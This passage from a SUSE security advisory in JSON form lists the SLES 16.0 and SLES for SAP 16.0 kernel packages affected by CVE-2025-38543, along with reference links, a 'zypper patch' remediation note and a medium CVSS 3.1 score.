"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38543",
"url": "https://www.suse.com/security/cve/CVE-2025-38543"
},
{
"category": "external",
"summary": "SUSE Bug 1248214 for CVE-2025-38543",
"url": "https://bugzilla.suse.com/1248214"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
